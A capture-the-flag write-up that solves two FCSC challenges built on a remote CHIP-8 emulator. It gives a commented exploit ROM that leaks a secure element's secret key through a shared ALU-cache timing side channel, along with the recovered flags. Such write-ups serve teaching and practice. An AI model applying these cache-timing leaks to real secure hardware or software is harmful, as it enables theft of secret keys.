BattleChip (misc, 495)
BattleChip was a misc challenge that leant towards what I think could have been categorized as a fun mixture of hardware & pwn.
We were given a CHIP-8 emulator implementation in Python. CHIP-8 is an interpreted programming language designed in the 1970s meant to be run on a virtual machine, that was primarily used to create videogames on old 8-bit machines.
The emulator runs on a remote server, which we can connect to and supply a ROM in hexadecimal. A few peripherals are implemented, including display, which is sent back to the client, and timers. (keyboard is not implemented, we can't play pong, or even better, Ventriglisse :()
Example of a Ventriglisse session (Slippery Slope) on CHIP-8

Prequel: Chip & Fish

BattleChip actually had a nice little prequel challenge called Chip & Fish to introduce us to CHIP-8 and communicating with the remote server.
We are told the flag is hidden in the 16 first bytes of the stack. Indeed, let us take a look at the given challenge1.py:
1
vm = emulator.Emulator()
2
sys.stdout.write("hex encoded rom:\n")
3
sys.stdout.flush()
4
data = sys.stdin.readlines(1)[0]
5
vm.untrusted_ctx.memory.data[Memory.O_STACK:Memory.O_STACK + len(FLAG_LV1)] = FLAG_LV1
6
vm.load(data)
7
vm.run()
Copied!
Memory.O_STACK holds the address of the beginning of the stack, which is 0xEA0, as in most implementations.
Therefore, all we need to do is write a tiny program that will dump the contents of these 16 bytes, between 0xEA0 and 0xEB0.
Disclaimer: I wrote all my programs directly in hexadecimal opcodes, but there are many comments to help understand them.
Let's have a look at the opcode table on Wikipedia. We notice a few instructions that will be of great help:
1
6XNN
2
Vx = NN
3
Sets VX to NN.
4
5
ANNN
6
I = NNN
7
Sets I to the address NNN.
8
9
DXYN
10
draw(Vx,Vy,N)
11
Draws a sprite at coordinate (VX, VY) that has a width of 8 pixels and a height of N+1 pixels. Each row of 8 pixels is read as bit-coded starting from memory location I; I value does not change after the execution of this instruction.
Copied!
We also learn that I is a general purpose 16-bit register for memory addresses.
With that in mind, we can already create our first very simple program:
1
6800 ; Set v8 = 0
2
6900 ; Set v9 = 0
3
aea0 ; Set I = 0xEA0 (stack)
4
d89f ; Draw 0xF+1 bytes from I at (v8, v9) on the screen
5
ffff ; Exit
Copied!
We submit our ROM to the server: 68006900aea0d89fffff and receive the display!
Convert this to binary and then hex, and we have our first flag!
FCSC{e50f91bc6418a7a79b0c3fe74bb5e600}

BattleChip: A few twists on the architecture

Now for the real challenge. We are told the implementation of the CHIP-8 virtual machine has several additional elements in its architecture.
BattleChip introduces a Secure Element which holds a secret key, and which adds a new execution context ("privileged") that can interface with it. Here's a summary of what it changes:
  • A 10-byte secret key is initialized at boot time (when we connect to the server)
  • An LRU cache (Least Recently Used) has been implemented in the ALU (Arithmetic Logic Unit). It is described as: operations in the ALU usually take up 2 cycles, but when they are cached, they only take up 1, which saves time.
  • Three new opcodes are added:
    • 0000 encrypts 10 input bytes (at I) with the secret key
    • 0001 verifies if our input is the secret key
    • 00E1 clears the ALU cache
  • When context is switched, memory is copied from unsafe space to safe space, but not the other way around (yes, we can't even know what is the result of the encryption with the 0000 opcode). Only the VF register is returned to unsafe space (to carry a return value).
What is particularly nice about this challenge is that we do not have to focus at all on the Python implementation (the source files), as all the elements we need to trust in are :
  • the CHIP-8 specifications (Wikipedia is largely sufficient) ;
  • the additional challenge specifications as they are described.
However, we are still going to have to reverse the pre-compiled routines for the new opcodes, because we don't know what they exactly do.
Basically, when the emulator is instanciated, two contexts are created; an untrusted one (the normal one) and a trusted one.
1
class Emulator:
2
def __init__(self):
3
self.untrusted_ctx = UntrustedContext()
4
self.trusted_context = TrustedContext()
5
6
self.untrusted_ctx.secure_element = self.trusted_context
Copied!
When the trusted context is created, it generates the random secret key, and sets the two pre-compiled routines encrypt and verify, where some bytes are dynamically replaced with bytes from the key.
1
class TrustedContext(BaseContext):
2
def __init__(self):
3
super().__init__()
4
self.execution_key = os.urandom(10)
5
self.co_encrypt = routines.preco_encrypt.format(*self.execution_key)
6
self.co_verify = routines.preco_verify.format(*self.execution_key)
Copied!
These routines are hardcoded in the emulator:
1
"""
2
def encrypt_0000(I):
3
\"""pre-compiled code
4
5
Xor a buffer of size 10 stores at I with a temporary key.
6
The secret key is already defined.
7
8
I is copied from the insecure context
9
10
=> The number of cycles needed to execute this routine
11
will be copied at the end of execution in the insecure context.
12
The 0xF-th register will contain the value.
13
\"""
14
[REDACTED]
15
"""
16
preco_encrypt = """
17
6301
18
62{:02X}
19
F065
20
8023
21
F055
22
F31E
23
24
[...]
25
26
62{:02X}
27
F065
28
8023
29
F055
30
F31E
31
FFFF
32
"""
Copied!
Fun fact, back then I totally didn't notice what was written about the number of cycles needed being returned to the insecure context. So we are going to pretend we never read this, as we can solve the challenge without it :^)
1
"""
2
def verify_0001(I):
3
\"""pre-compiled code
4
5
Xor a buffer of size 10 stores at I with a temporary key.
6
The secret key is already defined.
7
8
I is copied from the insecure context
9
10
=> 0xF-th register in the secure context will be copied
11
in the insecure context at the end of this routine execution
12
\"""
13
[REDACTED]
14
"""
15
preco_verify = """
16
6101
17
6200
18
19
F065
20
63{:02X}
21
8303
22
8231
23
F11E
24
25
[...]
26
27
28
8F20
29
FFFF
30
"""
Copied!
We can see in each routine there are 10 {:02X}, which are placeholders for the secret key bytes.
Octo (https://johnearnest.github.io/Octo/) is a slick online emulator for CHIP-8 that can also compile code and disassemble code in human readable assembly. Let's replace the placeholder secret key bytes with dummy ones (0x42), and disassemble the two routines.
1
: encrypt
2
v3 := 0x01
3
v2 := 0x42
4
load v0
5
v0 ^= v2
6
save v0
7
i += v3
8
v2 := 0x42
9
load v0
10
v0 ^= v2
11
save v0
12
i += v3
13
v2 := 0x42
14
load v0
15
v0 ^= v2
16
save v0
17
i += v3
18
v2 := 0x42
19
load v0
20
v0 ^= v2
21
save v0
22
i += v3
23
v2 := 0x42
24
load v0
25
v0 ^= v2
26
save v0
27
i += v3
28
v2 := 0x42
29
load v0
30
v0 ^= v2
31
save v0
32
i += v3
33
v2 := 0x42
34
load v0
35
v0 ^= v2
36
save v0
37
i += v3
38
v2 := 0x42
39
load v0
40
v0 ^= v2
41
save v0
42
i += v3
43
v2 := 0x42
44
load v0
45
v0 ^= v2
46
save v0
47
i += v3
48
v2 := 0x42
49
load v0
50
v0 ^= v2
51
save v0
52
i += v3
Copied!
As described earlier, the encrypt routine does indeed encrypt our input with the secret key using simple XOR operations, one byte at a time.
1
: verify
2
v1 := 0x01
3
v2 := 0x00
4
load v0
5
v3 := 0x42
6
v3 ^= v0
7
v2 |= v3
8
i += v1
9
load v0
10
v3 := 0x42
11
v3 ^= v0
12
v2 |= v3
13
i += v1
14
load v0
15
v3 := 0x42
16
v3 ^= v0
17
v2 |= v3
18
i += v1
19
load v0
20
v3 := 0x42
21
v3 ^= v0
22
v2 |= v3
23
i += v1
24
load v0
25
v3 := 0x42
26
v3 ^= v0
27
v2 |= v3
28
i += v1
29
load v0
30
v3 := 0x42
31
v3 ^= v0
32
v2 |= v3
33
i += v1
34
load v0
35
v3 := 0x42
36
v3 ^= v0
37
v2 |= v3
38
i += v1
39
load v0
40
v3 := 0x42
41
v3 ^= v0
42
v2 |= v3
43
i += v1
44
load v0
45
v3 := 0x42
46
v3 ^= v0
47
v2 |= v3
48
i += v1
49
load v0
50
v3 := 0x42
51
v3 ^= v0
52
v2 |= v3
53
i += v1
54
vF := v2
Copied!
The verify routine is quite similar to the encrypt one. The main change is that the XOR results are ORed together: if the final result is 0, we know the comparison was successful.
Finally, here is what happens when the verify routine returns 1 in VF (cu.py, control unit code):
1
se = self.cpu.context.secure_element
2
se.reset()
3
se.set_context(
4
i=self.cpu.processor.i,
5
memory=self.memory.data[self.memory.O_STACK:self.memory.SIZE]
6
)
7
flag = se.exc_verify()
8
self.cpu.processor.v[0xF] = se.cpu.processor.v[0xF]
9
if self.cpu.processor.v[0xF] == 0:
10
if self.cpu.processor.i+10+len(flag) > self.memory.SIZE:
11
raise MemoryError("Not enough memory space")
12
self.memory.data[self.cpu.processor.i+10:self.cpu.processor.i+10+len(flag)] = flag
Copied!
If we call verify with the secret key, the flag is copied in unsafe space memory and we will be able to read it. Our goal is thus to find a way to retrieve the secret key!

BattleChip: Exploit

As there is only one processor unit, the ALU cache is shared between the two contexts.
This means the number of cycles elapsed during an ALU operation can act as a binary side channel. If we measure only one cycle instead of two during, for instance, a XOR operation, we know it means it is currently cached.
Just to be sure, let's check out how the cache is implemented inside the emulator (alu.py):
1
def request(func):
2
wanted = None
3
@functools.wraps(func)
4
def wrapper(*args, **kwargs):
5
nonlocal wanted
6
if wanted is not None:
7
ret = ALU.Status.AVAILABLE, wanted
8
wanted = None
9
return ret
10
misses = func.cache_info().misses
11
ret = func(*args, **kwargs)
12
if func.cache_info().misses == misses:
13
return ALU.Status.AVAILABLE, ret
14
wanted = ret
15
return ALU.Status.PENDING, (None, None)
16
return wrapper
17
18
[...]
19
20
@request
21
@functools.lru_cache(maxsize=16)
22
def xor(self, a, b):
23
return a ^ b, 0
Copied!
An actual LRU cache from functools is used, with max size 16. The ALU has two possible states: AVAILABLE or PENDING. In cu.py:
1
state, result = self.cpu.alu.xor(self.cpu.processor.v[x], self.cpu.processor.v[y])
2
if state == self.cpu.alu.Status.PENDING:
3
self.pc -= 2
4
else:
5
self.cpu.processor.v[x], unused = result
Copied!
If the ALU is in the PENDING state, the PC register is rolled back two bytes, in other words the instruction is executed twice, and the next time it'll have switched to the AVAILABLE state. However, when the operation is cached, the ALU doesn't enter the PENDING state.
With this in mind, it is fairly easy to leak information about the secret key during the encrypt routine.
Denote P[k] = (0, ..., 0xFF, ..., 0) (10 bytes) with 0xFF at the k-th position.
We are going to ask the trusted context to perform P xor S, where S is the secret key, by putting P at position I and calling 0000. In particular, the operation 0xFF xor S[k] will be performed and put in cache. We can then bruteforce S[k] by computing 0xFF xor i for i in [0, 255] and counting the number of cycles each of these XOR operations lasted.
Of course, we should reset the cache with the 00E1 instruction at each iteration to avoid any problems. This allows us to recover the secret key in 2560 encryptions worst case, but it will run pretty fast anyways since everything is run server-side (we'll just send our ROM exploit once).
CHIP-8 has two useful instructions for counting cycles, thanks to the timer:
1
FX07
2
Vx = get_delay()
3
Sets VX to the value of the delay timer.
4
5
FX15
6
delay_timer(Vx)
7
Sets the delay timer to VX.
Copied!
The delay timer is simply a value that is decremented each cycle (and stays at 0 once it reaches it). So if we set the delay timer to some arbitrary value before performing a XOR operation, and then retrieve the value of the delay timer right after, we can use this latter value to know whether the operation was cached.
We have everything to build our exploit ROM. The following code is my commented exploit.
1
; I pointing to stack (copied in privileged context)
2
0xae 0xa0
3
; v1 = 1 (useful for increments)
4
0x61 0x01
5
6
; Set the first 10 bytes of memory to 0
7
0x60 0x00
8
0xf0 0x55
9
0xf1 0x1e
10
0x60 0x00
11
0xf0 0x55
12
0xf1 0x1e
13
0x60 0x00
14
0xf0 0x55
15
0xf1 0x1e
16
0x60 0x00
17
0xf0 0x55
18
0xf1 0x1e
19
0x60 0x00
20
0xf0 0x55
21
0xf1 0x1e
22
0x60 0x00
23
0xf0 0x55
24
0xf1 0x1e
25
0x60 0x00
26
0xf0 0x55
27
0xf1 0x1e
28
0x60 0x00
29
0xf0 0x55
30
0xf1 0x1e
31
0x60 0x00
32
0xf0 0x55
33
0xf1 0x1e
34
0x60 0x00
35
0xf0 0x55
36
0xf1 0x1e
37
38
0x62 0x00
39
; v2 = 0 <= k < 10 counter
40
41
; Set byte at index k to 0xFF
42
0xAE 0xA0
43
0xF2 0x1E
44
0x60 0xFF
45
0xF0 0x55
46
47
0x63 0x00
48
; v3 = 0 <= i < 256 counter
49
50
; Clear cache and call encrypt
51
0x00 0xE1
52
0xAE 0xA0
53
0x00 0x00
54
55
; Measure number of cycles of operation 0xFF ^ i
56
0x65 0x08
57
0x66 0xFF
58
0xF5 0x15
59
0x86 0x33
60
0xF0 0x07
61
62
; Display elapsed timer (debugging purposes :))
63
0xAF 0x80
64
0xF0 0x55
65
0x68 0x00
66
0x69 0x00
67
0xD8 0x9F
68
69
; v0 = 6 => fewer cycles than expected, break
70
0x40 0x06
71
0x12 0x70
72
73
; Increment i
74
0x73 0x01
75
76
; Loop if i != 0 (to 0x24C)
77
0x33 0x00
78
0x12 0x4C
79
80
; Save the byte we found at address 0xF00 + k
81
0xAF 0x00
82
0xF2 0x1E
83
0x80 0x30
84
0xF0 0x55
85
86
; Reset the byte at index k
87
0xAE 0xA0
88
0xF2 0x1E
89
0x60 0x00
90
0xF0 0x55
91
92
; Increment k
93
0x72 0x01
94
95
; Loop if k != 10 (to 0x242)
96
0x32 0x0A
97
0x12 0x42
98
99
; End of the brute-force
100
101
; Call verify with the secret we found
102
0xAF 0x00
103
0x00 0x01
104
105
; Flag should be copied at address I+10. Dump it!
106
0xAF 0x0A
107
0x68 0x00
108
0x69 0x00
109
0xD8 0x9F
110
111
; Exit
112
0xFF 0xFF
Copied!
Exploit ROM in hexadecimal : aea061016000f055f11e6000f055f11e6000f055f11e6000f055f11e6000f055f11e6000f055f11e6000f055f11e6000f055f11e6000f055f11e6000f055f11e6200aea0f21e60fff055630000e1aea00000650866fff5158633f007af80f05568006900d89f4006127073013300124caf00f21e8030f055aea0f21e6000f0557201320a1242af000001af146800690ad89f
Send it to the server and enjoy the show!